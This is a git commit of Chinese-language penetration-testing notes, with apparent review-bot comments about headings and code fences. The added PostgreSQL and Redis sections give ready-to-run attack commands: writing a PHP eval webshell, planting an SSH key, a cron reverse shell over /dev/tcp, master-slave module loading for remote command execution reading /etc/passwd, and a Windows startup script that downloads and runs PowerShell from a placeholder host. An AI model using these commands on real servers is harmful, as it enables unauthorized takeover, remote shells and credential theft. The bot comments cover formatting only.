Commit a867bc6

committed
mssql
1 parent 1629d26 commit a867bc6

2 files changed

+105
-4
lines changed

PostgreSQL.md

Lines changed: 12 additions & 1 deletion
@@ -1,4 +1,4 @@
1-
# Mysql
1+
# PostgreSQL
22

33
更新时间:2021.9.28
44

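Review bot: the commit message `mssql` matches nothing in this hunk, which renames the heading from `# Mysql` to `# PostgreSQL` (a copy-paste leftover from the MySQL notes); use a message that names the files actually touched, e.g. "PostgreSQL/Redis: fix headings, add getshell notes", so the history stays searchable.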
@@ -10,6 +10,17 @@
1010

1111
# GetShell
1212

13+
### 写shell
14+
15+
- 拥有网站路径写入权限
16+
- 知道网站绝对路径
17+
18+
```
19+
copy (select '<?php phpinfo();?>') to '/tmp/1.php';
20+
```
21+
22+
23+
1324

1425

1526

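Review bot: the fence opened at new line 18 has no language tag while redis.md in this same commit uses ```bash, so tag it ```sql for consistent highlighting. The two bullets at lines 15–16 read as prerequisites but are not introduced as such (a short "前提条件" lead-in would do), and the snippet's target `/tmp/1.php` does not illustrate the "absolute web path" bullet, so say explicitly that the path is a placeholder. The three empty additions at lines 21–23 can be dropped.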
redis.md

Lines changed: 93 additions & 3 deletions
@@ -1,4 +1,4 @@
1-
# Mysql
1+
# Redis
22

33
更新时间:2021.9.28
44

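Review bot: `更新时间:2021.9.28` at line 3 is left as unchanged context even though this commit adds roughly 90 lines to the file below; bump the update date here (and in PostgreSQL.md, which has the same line). The heading rename itself is the same copy-paste fix as in PostgreSQL.md.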
@@ -12,17 +12,107 @@
1212

1313

1414

15+
### 写webshell
1516

17+
- 已知web的绝对路径
1618

17-
# Vuln
19+
- 对应目录具有读写权限
1820

1921

2022

23+
```
24+
redis-cli -h 192.168.1.154
25+
config set dir /var/www/html
26+
set xxx "\n\n\n<?php@eval($_POST['c']);?>\n\n\n"
27+
config set dbfilename webshell.php
28+
save
29+
```
2130

2231

23-
# Privilege Escalation
2432

33+
### 写入ssh公钥getshell
2534

35+
- redis服务为root权限
36+
- 允许密钥登录
37+
- linux
38+
39+
```
40+
config set dir /root/.ssh
41+
config set dbfilename authorized_keys
42+
set xxssh "\n\nssh-rsa xxxxxx\n\n"
43+
save
44+
```
45+
46+
47+
48+
### 计划任务反弹shell
49+
50+
- redis服务为root权限启动
51+
52+
```bash
53+
config set dir /var/spool/cron/
54+
config set dbfilename root
55+
set xxx "\n\n\n* * * * * bash -i >&/dev/tcp/ip/端口 0>&1\n\n\n"
56+
save
57+
```
58+
59+
60+
61+
tips:**crontab反弹debian,ubuntu都不行**,因为他们对计划任务的格式很严格,必须要执行 `crontab -u root /var/spool/cron/crontabs/root` 通过语法检查后,才能执行计划任务。
62+
63+
64+
65+
### 主从rce
66+
67+
- redis服务为root权限启动
68+
- redis 4.x/5.x
69+
70+
本质上就是加载一个so文件,用来执行命令。和udf差不多。如果本身就可以上传文件的情况下,直接上传so文件加载即可,不用利用主从。主从的意思就是把当前redis设置为备份库,等着把恶意的远程db备份过来,进行加载。
71+
72+
```
73+
git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
74+
cd RedisModules-ExecuteCommand/
75+
make
76+
git clone https://github.com/Ridter/redis-rce
77+
python redis-rce.py -r 192.168.1.154 -L 192.168.1.153 -f module.so
78+
```
79+
80+
```
81+
https://github.com/vulhub/redis-rogue-getshell
82+
需要python3.0以上
83+
编译
84+
>cd RedisModulesSDK/
85+
>make
86+
会在此目录下生成exp.so
87+
执行命令
88+
>python3 redis-master.py -r 192.168.0.120 -p 6379 -L 192.168.0.108 -P 12138 -f RedisModulesSDK/exp.so -c "cat /etc/passwd"
89+
```
90+
91+
92+
93+
还可以写无损文件
94+
95+
https://github.com/r35tart/RedisWriteFile
96+
97+
98+
99+
还可以主从复制覆写shadow
100+
101+
102+
103+
### windows系统主从利用
104+
105+
- 需要启动项目录的写入权限
106+
- 服务器需要重启
107+
108+
109+
110+
```
111+
config set dir "C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/"
112+
config set dbfilename shell.bat
113+
set x "\r\n\r\npowershell -windowstyle hidden -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://xxx.xxx.xxx.2/shell.ps1');xx.ps1\"\r\n\r\n"
114+
save
115+
```
26116

27117

28118

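Review bot: removing `# Vuln` (old line 17) and `# Privilege Escalation` (old line 23) leaves the new `###` subsections (写webshell, 写入ssh公钥getshell, 计划任务反弹shell, 主从rce, windows系统主从利用) with no visible parent heading in this hunk; keep one `##` heading above them or confirm one exists above line 12. Fence style is inconsistent: line 52 uses ```bash but lines 23, 39, 72, 80 and 110 open untagged fences. The fence at lines 80–89 also mixes explanatory prose (`需要python3.0以上`, `编译`, `会在此目录下生成exp.so`, `执行命令`) with `>`-prefixed lines; move the prose outside the fence and drop the `>` prompts so the block is a clean code block. The `tips:` caveat at line 61 qualifies the block directly above it, so it reads better placed before that fence rather than after it.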